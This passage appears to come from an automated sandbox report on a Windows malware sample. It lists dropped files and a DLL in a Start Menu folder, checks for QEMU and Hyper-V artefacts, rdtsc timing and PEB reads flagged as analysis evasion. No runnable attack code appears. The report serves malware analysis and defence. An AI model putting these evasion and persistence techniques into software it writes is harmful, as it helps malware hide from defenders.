      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.BibJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\VatersotigesJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\KnoglemarvsundersgelsenJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\ArmoniacJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03320313 rdtsc 1_2_03320313
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeAPI coverage: 0.3 %
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_00406555 FindFirstFileW,FindClose,1_2_00406555
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405A03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0040287E FindFirstFileW,1_2_0040287E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeAPI call chain: ExitProcess graph end nodegraph_1-20454
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeAPI call chain: ExitProcess graph end nodegraph_1-20461
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39650788507.000000000194A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44176068670.000000000190C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44176520630.000000000194A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000003.39936791137.000000000194A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000001.00000002.39674469754.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, 00000005.00000002.44177087962.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03320313 rdtsc 1_2_03320313
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332DB33 mov eax, dword ptr fs:[00000030h]1_2_0332DB33
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332DB35 mov eax, dword ptr fs:[00000030h]1_2_0332DB35
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332CB5D mov eax, dword ptr fs:[00000030h]1_2_0332CB5D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03329178 mov eax, dword ptr fs:[00000030h]1_2_03329178
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332E5FD mov ebx, dword ptr fs:[00000030h]1_2_0332E5FD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332C1ED mov eax, dword ptr fs:[00000030h]1_2_0332C1ED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_033429D7 mov eax, dword ptr fs:[00000030h]1_2_033429D7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332CC27 mov eax, dword ptr fs:[00000030h]1_2_0332CC27
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0333202C mov eax, dword ptr fs:[00000030h]1_2_0333202C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_0332CC2D mov eax, dword ptr fs:[00000030h]1_2_0332CC2D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 1_2_03340817 mov eax, dword ptr fs:[00000030h]1_2_03340817
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBD71 mov eax, dword ptr fs:[00000030h]5_2_1D7CBD71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBD71 mov eax, dword ptr fs:[00000030h]5_2_1D7CBD71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A5D60 mov eax, dword ptr fs:[00000030h]5_2_1D7A5D60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864DA7 mov eax, dword ptr fs:[00000030h]5_2_1D864DA7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D791D50 mov eax, dword ptr fs:[00000030h]5_2_1D791D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D791D50 mov eax, dword ptr fs:[00000030h]5_2_1D791D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADD4D mov eax, dword ptr fs:[00000030h]5_2_1D7ADD4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADD4D mov eax, dword ptr fs:[00000030h]5_2_1D7ADD4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADD4D mov eax, dword ptr fs:[00000030h]5_2_1D7ADD4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D789D46 mov eax, dword ptr fs:[00000030h]5_2_1D789D46
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D789D46 mov eax, dword ptr fs:[00000030h]5_2_1D789D46
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D789D46 mov ecx, dword ptr fs:[00000030h]5_2_1D789D46
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84ADD6 mov eax, dword ptr fs:[00000030h]5_2_1D84ADD6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84ADD6 mov eax, dword ptr fs:[00000030h]5_2_1D84ADD6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78FD20 mov eax, dword ptr fs:[00000030h]5_2_1D78FD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov ecx, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAD20 mov eax, dword ptr fs:[00000030h]5_2_1D7BAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BCD10 mov eax, dword ptr fs:[00000030h]5_2_1D7BCD10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BCD10 mov ecx, dword ptr fs:[00000030h]5_2_1D7BCD10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85CDEB mov eax, dword ptr fs:[00000030h]5_2_1D85CDEB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D85CDEB mov eax, dword ptr fs:[00000030h]5_2_1D85CDEB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D83FDF4 mov eax, dword ptr fs:[00000030h]5_2_1D83FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79AD00 mov eax, dword ptr fs:[00000030h]5_2_1D79AD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79AD00 mov eax, dword ptr fs:[00000030h]5_2_1D79AD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79AD00 mov eax, dword ptr fs:[00000030h]5_2_1D79AD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79AD00 mov eax, dword ptr fs:[00000030h]5_2_1D79AD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79AD00 mov eax, dword ptr fs:[00000030h]5_2_1D79AD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79AD00 mov eax, dword ptr fs:[00000030h]5_2_1D79AD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B0D01 mov eax, dword ptr fs:[00000030h]5_2_1D7B0D01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81CD00 mov eax, dword ptr fs:[00000030h]5_2_1D81CD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81CD00 mov eax, dword ptr fs:[00000030h]5_2_1D81CD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78EDFA mov eax, dword ptr fs:[00000030h]5_2_1D78EDFA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D828D0A mov eax, dword ptr fs:[00000030h]5_2_1D828D0A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84BD08 mov eax, dword ptr fs:[00000030h]5_2_1D84BD08
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84BD08 mov eax, dword ptr fs:[00000030h]5_2_1D84BD08
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79BDE0 mov eax, dword ptr fs:[00000030h]5_2_1D79BDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BFDE0 mov eax, dword ptr fs:[00000030h]5_2_1D7BFDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840D24 mov eax, dword ptr fs:[00000030h]5_2_1D840D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840D24 mov eax, dword ptr fs:[00000030h]5_2_1D840D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840D24 mov eax, dword ptr fs:[00000030h]5_2_1D840D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840D24 mov eax, dword ptr fs:[00000030h]5_2_1D840D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D788DCD mov eax, dword ptr fs:[00000030h]5_2_1D788DCD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2DBC mov eax, dword ptr fs:[00000030h]5_2_1D7C2DBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2DBC mov ecx, dword ptr fs:[00000030h]5_2_1D7C2DBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80CD40 mov eax, dword ptr fs:[00000030h]5_2_1D80CD40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80CD40 mov eax, dword ptr fs:[00000030h]5_2_1D80CD40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D855D43 mov eax, dword ptr fs:[00000030h]5_2_1D855D43
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D855D43 mov eax, dword ptr fs:[00000030h]5_2_1D855D43
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78DDB0 mov eax, dword ptr fs:[00000030h]5_2_1D78DDB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864D4B mov eax, dword ptr fs:[00000030h]5_2_1D864D4B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D797DB6 mov eax, dword ptr fs:[00000030h]5_2_1D797DB6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D786DA6 mov eax, dword ptr fs:[00000030h]5_2_1D786DA6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811D5E mov eax, dword ptr fs:[00000030h]5_2_1D811D5E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D815D60 mov eax, dword ptr fs:[00000030h]5_2_1D815D60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D865D65 mov eax, dword ptr fs:[00000030h]5_2_1D865D65
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796D91 mov eax, dword ptr fs:[00000030h]5_2_1D796D91
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CD8A mov eax, dword ptr fs:[00000030h]5_2_1D78CD8A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CD8A mov eax, dword ptr fs:[00000030h]5_2_1D78CD8A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D836D79 mov esi, dword ptr fs:[00000030h]5_2_1D836D79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D790C79 mov eax, dword ptr fs:[00000030h]5_2_1D790C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D790C79 mov eax, dword ptr fs:[00000030h]5_2_1D790C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D790C79 mov eax, dword ptr fs:[00000030h]5_2_1D790C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D798C79 mov eax, dword ptr fs:[00000030h]5_2_1D798C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D798C79 mov eax, dword ptr fs:[00000030h]5_2_1D798C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D798C79 mov eax, dword ptr fs:[00000030h]5_2_1D798C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D798C79 mov eax, dword ptr fs:[00000030h]5_2_1D798C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D798C79 mov eax, dword ptr fs:[00000030h]5_2_1D798C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D813C80 mov ecx, dword ptr fs:[00000030h]5_2_1D813C80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CC68 mov eax, dword ptr fs:[00000030h]5_2_1D78CC68
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84FC95 mov eax, dword ptr fs:[00000030h]5_2_1D84FC95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBC6E mov eax, dword ptr fs:[00000030h]5_2_1D7CBC6E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBC6E mov eax, dword ptr fs:[00000030h]5_2_1D7CBC6E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
